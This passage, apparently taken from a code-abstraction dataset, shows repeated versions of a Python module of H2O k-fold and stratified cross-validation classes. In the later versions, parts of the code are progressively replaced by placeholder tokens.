self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n <function token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n <function token>\n <function token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n <function token>\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n <docstring token>\n <function token>\n <function token>\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle 